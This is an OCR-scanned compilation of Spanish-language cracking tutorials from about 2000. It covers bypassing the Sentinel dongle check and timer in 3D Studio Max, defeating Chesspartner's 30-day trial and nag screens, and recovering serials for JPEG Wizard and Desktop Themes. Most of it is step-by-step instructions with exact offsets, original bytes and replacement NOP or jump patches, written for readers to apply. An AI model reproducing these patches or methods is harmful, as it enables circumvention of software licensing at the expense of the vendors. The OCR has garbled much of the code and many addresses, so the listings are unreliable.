es la primera referencia. 


0046977C call sub_5C3910 
00469781 and eax, OFFFFh 
00469786 test eax, eax 
00469788 jz short loc_4697FA 


Parece sospechoso, se llama a una función y posteriormente se borra el word alto EAX mediante el AND, y se comprueba si 
EAX es igual a 0, si esto es así, se salta a la línea 4697FA, donde se encuentra nuestro test ebx,ebx. Probemos a invertir el 
salto y ver lo que sucede. Activemos el breakpoint a MessageBoxaA, pulsamos y para seguir, el breakpoint surte efecto, 
pulsamos F12 y aceptamos, de nuevo estamos en Softlce. Ponemos ahora un breakpoint sobre la linea 469788 con el 
siguiente comando del Softlce: 


> bpx 469788 


Desactivamos el bpx del MessageBoxA y pulsamos g para continuar el programa, este finalizará. Volvemos a ejecutarlo y 
estaremos de nuevo en Softlce, delante de la linea 469788. Ahora la modificaremos con el siguiente comando: 


> a 469788 
> ¡mp 4697FA 
> (pulsa enter y luego esc) 


Puedes ver com ha cambiado el código, ahora pulsa g para ver lo que sucede... Magia el programa funciona !! 


- Bueno, no te lo creas del todo, efectivamente el programa se inicia correctamente, puedes cargar y salvar archivos, pero... ¿ 
Averigua lo que sucede después de que el programa este abierto durante cierto tiempo ? Pues lo que era de esperar, se 
comprueba de nuevo la mochila, y se nos informa con otro mensaje de error. Podriamos actuar de la misma manera que lo 
hemos hecho antes, pero se trata de variar un poco y aprender nuevas técnicas, o no? 

Si te fijas, veras que el programa siempre comprueba la mochila en el mismo intervalo de tiempo, vamos a medir este tiempo 
aproximadamente. Coge un cronometro y conometra hasta que aparezca el mensaje de error, no ejecutes ninguna orden, 
solo espera. 

Después de aproximadamente 5 minutos aparecerá el mensaje de error. Si lo compruebas varias veces verás que el 
intervalo de tiempo siempre es el mismo, aproximadamente 5 minutos. Por lo tanto es posible que el programa utilize un 
temporizador que se active cada cinco minutos y compruebe la mochila. !! Lo cual quiere decir que si pudieramos 
eliminar el temporizador, podriamos eliminar también la comprobación de la mochila e incluso hariamos que la aplicación se 
ejecutará más deprisa !! Vamos a comprobarlo, primero necesitamos saber que funciones hay en windows para crear 
temporizadores. La única que yo conozco se llama SetTimer y tiene el siguiente formato: 


UINT SetTimer( 


HWND hWna, // handle de la ventana donde se enviaran los mensajes del temporizador 
UINT nIDEvent, // Identificador del temporizador 
UINT uElapse, // tiempo de espera en milisegundos 


TIMERPROC IpTimerFunc  // dirección del proceso que el temporizador ejecutará al alcanzar el tiempo de 
espera 


); 


Bueno lo más importante aquí es el tiempo de espera (uElapse), este valor se pasa como seguno parámetro, por lo tanto lo 
encontraremos en la pila a partir de (esp->0xC), ya que los 2 argumentos + la dirección de retorno ocupan 4 bytes cada uno 
(4*3=0xC). 

Teniendo en cuenta esto, en vez de poner un simple bpx SetTimer, utilizaremos un breakpoint condicional que sólo se 
ejecutará cuando se intente crear un temporizador con el tiempo de espera que nosotros le especifiquemos. Como vamos a 
buscar un temporizador que se active a los cinco minutos, deberemos convertir los minutos a milisegundos (5 minutos son 
60*5=300 segundos * 1000 = 300000) y el valor resultante a hexadecimal 3000000 en hexadecimal es 493E0. Por lo tanto el 
breakpoint quedará: 


> bpx SetTimer if (esp->C)==493E0 


Pues nada, entra en el Softlce y teclealo. Sal del Softlce y ejecuta el 3DMax, modifica el salto como hicimos previamente y 
continua con pulsando g. Antes de que desaparezca la pantalla de inicio, veras que el breakpoint del SetTimer a surtido 
efecto, pulsa F12 para ver el lugar desde donde se llamó y verás lo siguiente: 


004023A1 6A00 push 0 -> pasa NULL como función a ejecutar. 
00402343 68E0930400 push 493E0h -> Aquí estan los cinco minutos de espera !!! 
004023A8 6825100000 push 1025h -> Identificador 

004023AD 55 push ebp -> Handle de la ventana donde enviar mensajes 
004023AE 896804 mov [eax+4], ebp -> guarda handle de la ventana 


004023B1 FF1594755C00 call ds:SetTimer  -> establece el temporizador 
004023B7 8B0D40375F00 mov ecx, dword_5F3740 

004023BD 8B4108 mov eax, [ecx+8] 

004023C0 6800040000 push 400h 

004023C5 6870795E00 push 5E7970h 

004023CA 50 push eax 

004023CB 8944241C mov [esp+1Ch], eax 

004023CF E8EC280100 call sub_414CC0 

004023D4 8B54241C mov edx, [esp+1Ch] 


Como puedes comprobar se trata sin duda alguna de nuestra función. Ahora solo debemos pensar como hacer para eliminar 
el temporizador. Podemos sustituir por NOPs la llamada a SetTimer, pero tambien deberiamos de eliminar los 4 PUSH 
previos para no alterar el estado de la pila y provocar un posible cuelgue. Bien entonces vamos a hacer un resumen de los 
cambios necesarios, primero el salto en 469788, para averiguar el offset usaremos el IDA, nos colocaremos en la dirección 
469788 con el menu Navigate/jump to/Ask for Address e introduciremos 469788 luego iremos al menu Edit/Patch 
Program/Change Byte y allí se nos mostrará el offset del archivo que es 69788h (no cambies nada y pulsa cancel). 


Entonces en el offset 69788h encontraremos los bytes 7470 (que corresponden al salto jz short loc_4697FA) que 
cambiaremos por un salto incondicional (el opcode para un ¡mp es EB) por lo tanto quedará EB70. 


Y para el temporizador actuaremos de igual forma para los pushes y el call, quedando: 


Desde el offset 23A1h hasta el 23ADh sustituiremos todos los bytes por 90h (código del NOP) y 
desde el offset 23B1h hata el 23B6H sustituiremos todos los bytes por 90 (código del NOP). 


- Resumen: 
Offset: / Bytes originales / Sustituir por: 
23A1h  /6A 00 68 E0 93 040068 2510000055  /90 90 90 90 90 90 90 90 90 90 90 90 90 
23Bih /FF1594755C00 190 90 90 90 90 90 
69788H /7470 /EB 70 


Gracias a Alfredo10 por corregir un fallo tipográfico en el offset (parece ser que hay alguien que si lee esto, 
aunque sea por las malas :) ). 


- Bueno esto es todo para los que busquen un crack rápido, pero nuestro propósito es aprender un poquito más.Lo siguente 
es sólo necesario para los que esten interesados en conocer algunos trucos más. Sabemos que el 3DMax utiliza una mochila 
tipo sentinel (mira en el CD y veras un archivo VXD con este nombre), vamos a utilizar otro de los metodos descritos en mi 
tutorial genérico sobre mochilas, el metodo 4 (anticiparse a la carga del VXD). 


Utilizaremos el EXE sin modificar, por lo que si ya has modifcado el EXE, deberás recuperarlo. 


Borramos todos los breakpoints que tengamos y establecemos un BPX condicional para capturar la carga del controlador 
sentinel.vxd con el Softlce: 


> bpx CreateFileA if *(esp->4+4)=="SENT" 


el breakpoint surte efecto, estamos dentro de la función CreateFileA, comprobamos que efectivamente se va a cargar el 
driver sentinel.vxd con: 


> d *(esp+14) 


veremos SENTINEL.VXD en la ventana de datos del Softlce.Pulsamos F12 para ejecutar la función y volver al código que 
llama a CreateFileA, veremos algo así: 


005C3000 sub_5C3000 proc near ; C 

005C3000 push 0 // prepara parametros para CreateFileA 
005C3002 push O 

005C3004 push 3 

005C3006 push O 

005C3008 push O 

005C300A push O 

005C300C push 5C2FE0h // dirección de la cadena "W. ISENTINEL.VXD" 
005C3011 call j_CreateFileA // llama a CreateFileA 

005C3016 mov ecx, [esp+4] 

005C301A cmp eax, OFFFFFFFFh  // comprueba que se devuelve un handle correcto, eax debe de ser <> a - 
4 


005C301D mov [ecx], eax // guarda el handler en la posicon apuntada por ECX 
005C301F ¡nz short loc_5C3028  // salta si el handle es válido 

005C3021 mov ax, 1C0Bh // retorna un misterioso código de error 

005C3025 retn 4 // y retorna 

005C3028 

005C3028 loc_5C3028: ; CODE XREF: sub_5C3000+1F j 

005C3028 mov ax, 1C00h // retorna otro misterioso código de error 

005C302C retn 4 // y retorna 


005C302C sub_5C3000 endp 


El código anterior intenta cargar el dispositivo virtual que controla la mochila. Según el funcionamiento de la función 
CreateFileA, si se pudo abrir el dispositivo, se retorna un valor diferente a INVALID_HANDLE_VALUE que es una constante 
del API de Windows que equivale a -1 (FFFFFFFFH). La rutina comprueba esta condicición en la línea 5C301A mediante la 
instrucción cmp eax,OFFFFFFFFh. Se guarda el handle, aúnque este no sea válido y se retorna el valor 1C0Bh si no se pudo 
abrir el dispositivo y 1C00h si se obtuvo un handle válido. 

Por lo tanto sabemos que esta función siempre devolverá uno de estos dos valores. Nuestro código de error que indica que 
todo va bien es el 1C00h. 

Si continuamos trazando hasta ejecutar el ret veremos algo así: 


005C30B0 sub_5C30BO0 proc near ; CODE XREF: sub_5C2D80+5 p 
005C30BO0 sub esp, 4 

005C30B3 push esi 

005C30B4 mov esi, [esp+0Ch] 

005C30B8 lea eax, [esp+4] 

005C30BC push eax 


005C30BD call sub_5C3000 -> Aquí se llama a la rutina anterior 
005C30C2 mov [esi+6], ax -> guarda el código de error retornado 
005C30C6 or al, al -> comprueba si AL = 0 

005C30G8 j¡z short loc_5C30D9  -> salta si es O 

005C30CA or ah, ah -> comprueba si AH =0 

005C30CC ¡nz short loc_5C30FA  -> salta si AH = 0 

005C30CE or ax, 1C00h -> solo llegaráremos aquí en caso de que la llamada a 5C3000 retorne 
1C0B, esto hace que AX valga 1C0B siempre 

005C30D2 pop esi -> restaura la pila 

005C30D3 add esp, 4 

005C30D6 retn 4 -> y regresa con código de error 1C0Bh 


Si se pudo cargar el driver, se tomará el salto en 5C30C8 que nos llevará hasta aquí: 


005C30D9 loc_5C30D9: ; CODE XREF: sub_5C30B0+18|j 


005C30D9 mov eax, [esp+4] -> carga Handle al dispositivo SENTINEL.VXD 


005C30DD push esi -> empuja un parámetro que no sabemos aún que es 
005C30DE push eax -> pasa handle de SENTINEL.VXD 

005C30DF call sub_5C3030 -> llama a una función (ver más abajo) 

005C30E4 mov eax, [esp+4] 

005C30E8 push eax 


005C30E9 call sub_5C3090 
005C30EE mov ax, [esi+6] 
005C30FP2 or ah, ah 

005C30F4 ¡nz short loc_5C30FA 


005C30F6 or ax, 1C00h -> Otra vez el misterioso código de error 
005C30FA loc_5C30FA: -> aquí sólo llegamos desde 5C30CC 
005C30FA pop esi 


005C30FB add esp, 4 
005C30FE retn 4 


Previamente se abrió el driver SENTINEL.VXD, por lo que es lógico pensar que este código enviará datos al driver y este a la 
mochila. La aplicación solo tiene una manera de comunicarse con el VXD y es mediante la función DevicelOControl. La 
función DevicelOControl tiene la siguiente forma: 


BOOL DeviceloControl( 


HANDLE hDevice, // handle to device of interest 

DWORD dwloControlCode, // control code of operation to perform 
LPVOID IpinBuffer, // pointer to buffer to supply input data 
DWORD nInBufferSize, // size of input buffer 

LPVOID IpOutBuffer, // pointer to buffer to receive output data 
DWORD nOutBufferSize, // size of output buffer 


LPDWORD IpBytesReturned, // pointer to variable to receive output byte count 
LPOVERLAPPED IpOverlapped  // pointer to overlapped structure for asynchronous operation 
); 


Si continuamos trazando dentro de las funciones veremos que nuestras predicciones se cumplen. Este es el código que 
verás al entrar en la función llamada en la linea 5C30DF: 


005C3030 sub_5C3030 proc near ; CODE XREF: 5C30DF 
005C3030 sub esp, 4 


005C3033 push esi -> empuja ESI 
005C3034 mov esi, [esp+10h] -> carga ESI de nuevo (esto no es necesario) 
005C3038 push esi -> y lo vuelve a empujar a la pila 


005C3039 mov word ptr [esi+6], OFFFFh -> establece posición de memoria a FFFFh 
005C303F call sub_5C2990 
005C3044 lea eax, [esp+4] 


005C3048 push 0 -> pasa NULL como puntero a una estructura para las operaciones 
asincronas 

005C304A push eax -> pasa puntero a una variable que recibira el numero de bytes de salida 
en mi caso 9CF694 

005C304B push 0 -> Tamaño del buffer de salida O 

005C304D xor eax, eax -> borra EAX 

005C304F push 0 -> pasa NULL como buffer donde recibir datos 

005C3051 mov ax, [esi+2] -> carga en AX el tamaño del buffer de entrada 

005C3055 push eax -> tamaño del buffer de datos de entrada 

005C3056 push esi -> Pasa el buffer con información 

005C3057 mov eax, [esp+24h] -> Carga handler del VXD en EAX 

005C305B push 1 -> código de operación 1 

005C305D push eax -> pasa handle como primer argumento 

005C305E call ¡_DeviceloControl -> Envia comandos al dispositivo VXD, y retorna 1 si todo OK 
005C3063 push esi -> pasa de nuevo el buffer de entrada 

005C3064 call sub_5C2950 -> realiza muchos calculos sobre la estructura 

005C3069 cmp word ptr [esi+6], OFFFFh -> comprueba los datos del buffer de entrada 

005C306F ¡nz short loc_5C3077 -> sino es igual salta 

005C3071 mov word ptr [esi+6], 1C3Bh -> guarda 1C3B en el buffer de entrada 

005C3077 loc_5C3077: ; CODE XREF: 5C306F 

005C3077 mov ax, [esi+6] -> guarda en AX datos del buffer 


005C3078B pop esi -> restaura la pila 


005C307C add esp, 4 
005C307F retn 8 -> y retorna con código en AX = 400h 
005C307F sub_5C3030 endp 


Como era de esperar este código prepara los argumentos para la función DevicelOControl y posteriormente en la línea 
5C3064 se llama a una función (5C2950) la cual realiza una serie de cálculos sobre la estructura pasada en ESI. No he 
incluido estos cálculos por ser muy extensos. 


Si continuamos trazando después de la llamada veremos que el programa toma el salto en 5C306F y retorna en AX el valor 
que habia en el buffer de entrada apuntado por [ESI+6]. Continuamos hasta ejecutar el ret y estaremos al principio: 


005C30DF call sub_5C3030 -> venimos de aquí 

005C30E4 mov eax, [esp+4] -> estamos aquí, carga en EAX en Handle del VXD 
005C30E8 push eax -> Pasa handle 

005C30E9 call sub_5C3090 -> llama a función que cierra el VXD con CloseHandle y retorna 1C00 en 
EAX 

005C30EE mov ax, [esi+6] -> recuperamos el valor de retorno 

005C30FP2 or ah, ah -> comprueba si AH =0 

005C30F4 ¡nz short loc_5C30FA -> no, salta 

005C30F6 or ax, 1C00h -> todo bien 

005C30FA loc_5C30FA: -> aquí sólo llegamos desde5C30CC 

005C30FA ; y desde 5C30FA 

005C30FA pop esi 


005C30FB add esp, 4 
005C30FE retn 4 


Bueno por todo lo que tenemos hasta ahora parece que el programa utiliza códigos de error para comprobar el exíto de sus 
operaciones, por lo que podemos deducir, el código que indica que todo va bien es 1C00h y cualquier otra cosada un error. 
Aún así hemos comprobado que la comuncación con el VXD se cierra en cualquier caso, por lo que podemos sospechar que 
el programa volverá a abrir el VXD con CreateFileA y volverá a establecer comunicación con este. 

Reactivaremos nuestros breakpoints (si los habias borrado, vuelvelos a crear) y pulsaremos g en Softlce para continuar. 
Veremos que de nuevo el Softlce se activará, pulsamos F12 para ver desde donde se llamó a CreateFileA y veremos que ya 
habiamos pasado por aquí, estamos de nuevo en 5C3000. Esto nos da otra pista, parece que la función en 5C3000 se utiliza 
en más de un sitio, por lo que vamos a pulsar de nuevo F12 para ver desde donde se llamó. Para nuestra sorpresa veremos 
que a sido llamada desde 5C30BD y aquí ya estuvimos antes, por lo que pulsaremos de nuevo F12. Ahora veremos que 
estamos en una nueva dirección: 


005C2D80 sub_5C2D80 proc near ; CODE XREF: sub_5C23B0+43 p 
005C2D80 mov eax, [esp+4] 

005C2D84 push eax 

005C2D85 call sub_5C30B0 

005C2D8A retn4  ->ESTAMOS AQUÍ 

005C2D8A sub_5C2D80 endp 


Bueno parece que no hay muchas opciones por lo que pulsaremos F12 de nuevo y veremos: 


005C24ED call sub_5C23B0 

005C24F2 mov [esi+6], ax  -> ESTAMOS AQUÍ, guarda resultado en ESI+6 
005C24F6 pop esi -> reajusta la pila 

005C24F7 add esp, 4 

005C24FA retn 4 -> y retorna 


notese como se almacena en [esi+6] el resultado de la función previa, pulsamos F12 de nuevo y vemos: 


005C396C mov word ptr [esi+6], 403h 

005C3972 

005C3972 loc_5C3972: ; CODE XREF: sub_5C3910+78 
005C3972 cmp word ptr [esi+6], 403h 

005C3978 ¡nz short loc_5C398A 

005C397A mov [esi+0Ah], bl 

005C397D push esi 


005C397E call sub_5C2460 -> venimos de aquí 
005C3983 inc bl -> incrementa contador 
005C3985 cmp bl, 3 -> llevamos 3 intentos ? 


005C3988 jbe short loc_5C3972 -> No, continua en 5C3972 


005C398A 

005C398A loc_5C398A: 
005C398A mov ax, [esi+6] 
005C398E mov cx, ax 
005C3991 and cl, 9 
005C3994 cmp cl, 9 
005C3997 ¡nz short loc_5C39A2 
005C3999 mov ax, 3 
005C399D pop esi 

005C399E pop ebx 
005C399F retn 8 

005C39A2 loc_5C39A2: 
005C39A2 push eax 
005C39A3 call sub_5C3110 
005C39A8 pop esi 

005C39A9 pop ebx 
005C39AA retn 8 

005C39AA sub_5C3910 endp 


; CODE XREF: sub_5C3910+68 j 
-> carga en AX resultado de la función 
-> lo copia a CX 
-> realiza un AND sobre el byte bajo del resultado 
-> es 97 
-> no, salta a 5C39A2 
-> si, devolvemos 3 
-> reajusta pila 


-> y retorna 
; CODE XREF: sub_5C3997 

-> pasa resultado como parametro a la función siguiente 
-> llama a una función,valor de retorno en EAX 

-> restaura pila 


-> y retorna. 


El programa realiza tres intentos (línea 5C3985) para comprobar la mochila y después de eso lee el valor de retorno de esi+6 
realiza un AND con nueve y comprueba el resultado con 9, ni no es igual la función retorna 3 en AX (línea 5C3999) y sale. Si 


continuas trazando hasta ejecutar el ret, veras que después te aperecerá el código al cual hemos llegado utilizando el 
metodo del MessageBox(pincha aquí para ir a este código), a partir de aquí el modus operandi es el mismo :). Con esto 


queda demostrado que siempre existe más de una puerta de entrada. 


Karpoff Spanish Tutor 


Programa: Chesspartner 4.0.0.3 


PROTECCION: Trial 30 dias 


Descripcion: 


Un buen juego de ajedrez 


Dificultad: Principiante+ 


Herramientas: | SmartCheck v6.x 


CRACKER: Mongui FECHA: 17/08/2000 


INTRODUCCION 


Chesspartner v 4.0.0.3 


Programa de ajedrez con multiples opciones y posibilidades, tanto de aprendizaje como 
de configuración, uno más para los amantes de este deporte. 


El programa esta completamente operativo durante 30 días, despues de los cuales, 
claro, deja de funcionar; tiempo insuficiente para comprobar todas sus funciones, asi 
que vamos a intentar alargar el tiempo de prueba. 


Tiene la opción de registro mediante serial, pero yo al menos no lo he conseguido. 


AL ATAKE 


Lo primero es Caducar el programa (adelantamos el reloj de windows un par de meses) y nos 


sale el mensaje "The evaluation period for Chesspartner....... Ms 


Bien,tiramos del W32dasm y lo desensamblamos sin problemas (no esta comprimido ni nada 
extraño) y nos vamos a las string data references y buscamos la frasecita de arriba, doble 
click y aparecemos aqui. 


Si nos fijamos un poco más arriba vemos una comparación y un salto, ¡¡¡¡¡Quietorrrrr!!!!, 
seguro que ya pensabas en invertir el salto, pues no hombre, no es tan facil. 


Ves el call que hay arriba, ponte sobre el y dale al cursor derecha para ir a esta llamada y 
llegas aquí: 


Bueno, aqui el programa despues de una comparación con cero produce un salto, que en este 
caso si que vamos a invertir, apuntamos el offset en la barra abajo (1A4D6) y con tu editor 
hexadecimal favorito inviertes el salto cambiando el 7405 por 7505 con lo cual la 
instrucción pasa de ser je a jne (salta si no es equivalente). 


Bien, el programa ya Carga bien, sea cual sea la fecha pero sale una nag screen muy pesada 
al principio que nos invita a registrarnos y no solo eso, sino que cuenta los dias uno a uno 
con un considerable retraso que se hace muy pesado y si deseamos salir del programa nos sale 
otra nag recordandonos que nos registremos. 


Vamos a quitar las nags. 


Cargamos el Softice y esperamos a que salga la primera nag; vamos a poner un bpx cuando 
desaparezca la ventana y saber que función es llamada y asi poder desactivarla, esto se hace 
entrando en el softice (control + D) y tecleando HWND con lo cual nos sale el número de 
procesos que hay en ese momento en el ordenador, buscamos el del programa que estamos 
ejecutando y el correspondiente al botón continuar, llegados a este punto he de decir que yo 
he usado otro programa para hallar el handle y que es un programa que saque de la pagina web 
de Spanish reverse engenering y que se llama Win_id, solo hay que ejecutarla y poner el 
cursor soble el botón continuar y nos dice el handle, mucho más rapido y sencillo que con 
softice. 


3 ChessPartner 4.3 - Lokasoft standard Chess Engine - LCHESS 4.0.0.3 


File Edit View Game Moves Intemet Extra Layout Window Register Help 
DOSO ¡Sra Ne [ato PEA [carr 0005 
Black: 


X EN 2 y ES 2 A E Opening: BOO KP: Nimzovich Defense 
Aaddanrtalo”” 


Registration Information 


Date: 2??? 
White: 


lp 
E parada sad haomaia allows pou to try a 
prog EN If you find ChessPartner useful, you 


: 34h Parent Hwnd. - D37ch 


: 0002h 8T34bh  CAHERRAMIENTASSWIN_IDAWIN. 
: Button ffta256th COAARCHIVOS DE PROGRAMAsADI 
: Continu ífícb2e3h  CARCHIVOS DE PROGRAMASLOF 
Window Proc at : BD4cbcach fffabd63h CAARCHIVOS DE PROGRAMA MIC 
ES - AODO0Oh d241fh  CAHERRAMIENTASw32DASMNw 
SR - Oh fiddacth — CAWINCMDERSWINCMD32.EXE 
A ifffecibh — CAARCHIVOS DE PROGRAMADU, 
a oa pode ffícolebh  C:XWINDOWSISYSTEMISYSTRAY 
Dimensions ¿width= 75, 004bh * height= 23, 001 7h ffffedafh CSWINDOWSEXPLORER EXE 
HEEGA CAWINDOWSASYSTEMtmmtask.tsh 
a OR fíffcdIh — CAWINDOWSISYSTEMADDHELP.E 
: ST2ZH— CAWINDOWSASYSTEMAMPREXE. 
DLG Proc Addr : DOOOD000h ffÍFOTIbh — CWINDOW'SASYSTEMIMSGSAV: 
DLG ID : DDOZh fef?dAhh  TAMANDIO SAS YSTFMAKFANFI 2 


Help ID : DODOh 
Thread ID : b3dO 7h 


Aqui vemos el programa de fondo de ajedrez y el programa win identifier de Black Fenix en 
primer plano, despues de poner el cursor sobre continue, y vemos que en la parte de arriba 
del programa win identifier esta el Hwnd que es 0394 y que Cambia en cada ordenador asi que 
no pongas el mio. 


Bien sigamos, vamos al softice y ponemos Bmsg 0394 Wm_destroy (Softice saltará cuando se 
destruya esta ventana) damos a f5 y nos vamos a pulsar el botón continue, salta el softice y 
nos vamos de caza, despues de unos cuantos f12 llegamos a la sección de nuestro programa, 
algo asi como cp4.txt y alli vemos la dirección de memoria que ejecuta la orden de creación 
de la ventana algo asi como: 


004252e8 834dfcff or dword ptr [ebp-4], ffffffff 


Apuntamos la dirección y nos vamos al w32dasm, cargamos el programa y vamos a la dirección 
004252e8: 


I 
:004252E3 ES?2C50000 Call 00431854 


:004252EC 8D4D8C lea ecx, dword ptr [ebp-74] 


bien, el call de arriba es el que llama a la ventana de recordatorio, asi que nos situamos 
sobre el call y apuntamos el offset en la ventana de abajo (252E3), nos vamos al editor 
hexadecimal, yo uso el Hview y vamos a anular la llamada con nops asi que nos ponemos en la 
dirección y sustituimos E872C50000 por 9090909090, recuerda tantos bites quitas, tantos 
pones. 


Ejecutamos el programa y ya entramos directamente en el programa. 


Para quitar la segunada nag, la que apararece al salir,hacemos lo mismo, localizamos el 
handle sobre el botón exit, ponemos un bpx para saber cuando desaparece la ventana, nos 
situamos sobre el programa con f12 (unos cuantos), apuntamos la dirección de memoria, 
cargamos al W32dasm y vamos a esta dirección, nos situamos sobre el call anterior, apuntamos 
el offset y con un editor hexadecimal nopeamos la llamada, con lo cual el programa va de 
maravilla y podemos evaluarlo con toda la calma del mundo. 


Además de parchear el ejecutable tambien puedes hacer un crack o un cargador con las muchas 
utilidades que hay aunque eso es otra historia. 


Quiero dar las más encarecidas gracias a todas las personas que hacen que la informatica 
tenga un nuevo sentido en mi vida, el del apasionante mundo de la ingieneria inversa, porque 
sin su ayuda nuestro esfuerzo naufragaria una y otra vez contra la ignorancia, ellos son los 
dioses del ciberespacio y son las personas que con su desinteres hacen que merezca la pena 

star delante del ordenador dos horas haciento este tuto; gracias a todas las paginas que 
nos enseñan a preguntarnos el porque de las cosas, a investigar, a descubrir y ser curiosos, 
a los ECD, la pagina de Karpoff,Reversed Minds, etC..... GRACIAS¡¿GRACIAS;¡¿GRACIAS DE VERDAD. 


SI USAS ESTE PROGRAMA PARA ALGO MÁS QUE PARA EVALUARLO, DEBES DE COMPRARLO, SI ALGUNA VEZ TE 
PONES A PROGRAMAR, SABRAS DE SOBRA A QUE ME REFIERO. 


El ajedrez es la vida. 


(Bobby Fischer). 


La ingenieria inversa es lo más parecido que he encontrado al ajedrez. 


(Mongui'00). 


Karpoff Spanish Tutor 


JPEG WIZARD 1.3.0.4 


Programa: 


PROTECCION: Serial. Ejecutable comprimido 


Descripcion: 


Programa para optimizar las imagenes en formato .jpeg 


Dificultad: Principiante 


Softlce v3.25, Hview 6.16 


CRACKER: Mongui FECHA: 17/08/2000 


Herramientas: 


INTRODUCCION 


Este programa sirve para optimizar las fotografias en formato .jpeg, añadirles 
efectos, etc...nado de otro mundo, pero de lo que se trata es de aprender y compartir 
lo aprendido. 


AL ATAKE 


El ejecutable esta comprimido con el UPX, lo podemos descomprimir y desamblar, yo en su 
momento lo hice con Procdump (de 700 k a 2800 k el archivito) y lo desensamble con W32dasm 
(unos 20 minutos en un 500), pero despues de varias vueltas vi que no me era rentable 
atacarlo de esta manera, asi que use el Softice. 

Cargamos softice, ejecutamos el programa y vamos a registro, introducimos un nombre y un 
serial cualquiera. 


Ctrl1+D y vamos al softice, ponemos los bpx más frecuentes pero no me salta asi que al 
final pruevo con bpx hmemcpy y este si que va. 


Ya estamos de nuevo en el softice pulsamos de nuevo ctrl+d para que sigamos la pista al 
serial, si no lo hacemos asi, seguiriamos la pista al nombre (+Mongui he usado yo). 


Ahora hay que ir a la parte del programa ya que si te fijas estas en la dll user32, para 
ello pulsamos F12 unas cuantas veces (7) y nos situamos en Jwizard!upx+00037E71, bien, ahora 
estamos en la zona de memoria en la que se esta ejecutando nuestro programa, ahora vamos a 
pulsar F10 unas cuantas veces (10 más o menos) hasta que llegamos a un call seguido de un 
salto que nos lleva fuera a la nag que nos dice que somos unos mentirosos, lo cual nos hace 
pensar que el salto despues del call lo hara en función de si el serial es el correcto o 


no. 


Bueno, a estas alturas alguno habrá pensado cambio el salto y listo, si vale, yo tambien lo 
hice como buen newbie que se precie y el programa nos acepta cualquier registro, pero 
despues de cerrar el programa no guarda los cambios y nos dice que seguimos sin registrar, 
asi que lo que vamos a hacer el entrar en la llamada anterior al salto haber que diantres 
hay y mirar a ver si tenemos un serial valido para nuestro original nombre. 


Para entrar en el call 00404014 nos ponemos sobre el con F10 y con F8 entramos dentro y 
vemos lo siguiente: 


(Nota: Esta imagen la saque de W32dasm despues de Casi 20' ) 


Bueno, seguimos, que nadie se pierda por favor; con F10 vamos hasta mov esi,eax y ponemos D 
eax y aparece 114676563, otro F10 y nos ponemos sobre mov edi,edx, ponemos D edx y aparece 
nuestro serial falso, y despues viene una comparación, me parece que ya lo tenemos. 


bc * para quitar los breakpoints y provamos el serial con nuestro nombre y funciona. 


Agradecimientos: Muchisimas gracias a todas las personas que nos hacen ver la informatica 
desde otro punto de vista fascinante, otra fascinante faceta de este gran mundo...... en 
especial a los ECD y a la pagina de Karppof y a la de Reversed Minds. 


(Mongui'00). 


Karpoff Spanish Tutor 


Programa: Desktop Themes v1.89 


PROTECCION: Pescar el Serial Number 


Descripcion: Utilidad personalización del sistema 
Dificultad: Principiante++ 


DOWNLOAD: http: //www.|ss.com.au 


Herramientas: Softl CE v4.05 - Depurador 


CRACKER : MeGaBiTe | FECHA: | 22/08/2000 


INTRODUCCION 


Toma de Contacto con El Programa: 


Antes de empezar, deberemos como siempre recabar un poco de información a fin de 
saber exactamente lo que tenemos que hacer. En primer lugar ejecutamos el programa, y 
comprobamos que nos deja ejecutarlo en versión durante 30 días, después de lo cual 
nos lo deja en versión Lite, con algunas funciones desactivadas. Según el autor, para 
ambas versiones hay que registrar el programa. Nosotros lo haremos para la versión 
Stándard, totalmente funcional. Todo esto se consigue introduciendo un serial. 


En realidad, no entiendo que quiere decir el programador con registrar las dos 
versiones, pero en fin, estos estúpidos e ineptos "creadores" hacen de sus bichitos 
inútiles aplicaciones cuando se les aplica la premisa de "comercial". 


Dejémonos de Zarandajas y vayamos a por el Serial, que es lo que nos interesa. 


AL ATAKE 


Acerca de éste sistema de protección 


La protección de éste programa consta de un Name y un Code que debemos introducir para que la pestaña 
'Edit Theme' se active y nos permita editar los diferentes elementos de los Themes. 


El ensayo 


Bueno, lo primero que vamos a intentar es hacer break en el código del programa para ver qué nos 
encontramos por ahí dentro. Probaremos en primer lugar con las funciones API más comunes en éstos casos; 
éstas son 'getWindowTextA' y 'getDlgltemTextA!. 


Vamos a activar Softl CE pulsando Ctrl-D; una vez en el interface de Softl CE ponemos un par de breakpoints 
en las funciones anteriormente mencionadas. Para éllo, escribimos: "BPX getWindowTextA", pulsamos 
Intro y de nuevo escribimos: "BPX getDlgltemTextA", e Intro. Pulsamos F5 para regresar a la aplicación, 
una vez allí activamos la pestaña 'Edit Theme' con lo cual podremos ver las edit box en las que introducir la 
información de usuario. En la edit box 'Name' yo he introducido 'MeGaBiTe' y en la edit box 'Code' he 
introducido '1193046'. Ahora pulsamos el botón 'Ok.. 


Soft! CE hará break al inicio de la función getDlgltemTextA; como no nos interesa tracear ésta función de 
librería, pulsamos F11 para salir de la función e ir a la instrucción siguiente a la que realizó dicha llamada. 
Con éllo, ésto es lo que veremos: 


0177:0040D056 CALL EDI 

0177:0040D058 PUSH 0043041C >Aterrizamos aquí 
0177:0040D05D LEA ECX, [EBP+FFFFEFBDO] 
0177:0040D063 CALL 00403875 
0177:0040D068 CMP [EBP-4C],BL 
0177:0040D06B  JZ 0040D081 
0177:0040D06D LEA EAX, [EBP-4C] 
0177:0040D070 EA ECX, [EBP+FFFFEFBDO] 
0177:0040D076 PUSH EAX 

0177:0040D077 PUSH 00430600 
0177:0040D07€ CALL 00403ED4 
0177:0040D081 CMP [EBP-24],BL 
0177:0040D084  JZ 0040D09A 
0177:0040D086 EA EAX, [EBP-24] 
0177:0040D089 EA ECX, [EBP+FEFFFFBDO] 
0177:0040D08r PUSH EAX 

0177:0040D090 PUSH 004305F8 
0177:0040D095 CALL 00403ED4 
0177:0040D09A PUSH DWORD PTR [EBP+0C] 
0177:0040D09D CALL 00405572 >Traceamos hasta aquí 
0177:0040D0A2 TES EAX, EAX 
0177:0040D0A4 POP ECX 

0177:0040DOA5  JZ 0040D22F 
0177:0040DOAB PUSH 28 

0177:0040DOAD CALL 00404B41 
0177:0040D0B2 POP ECX 

0177:0040D0B3 PUSH EAX 

0177:0040D0B4 LEA EAX, [EBP-022C] 
0177:0040DOBA PUSH EAX 

0177:0040DOBB CALL [KERNEL32!1strcpy] 
0177:0040D0C1  CMP BYTE PTR [EBP-4C],54 


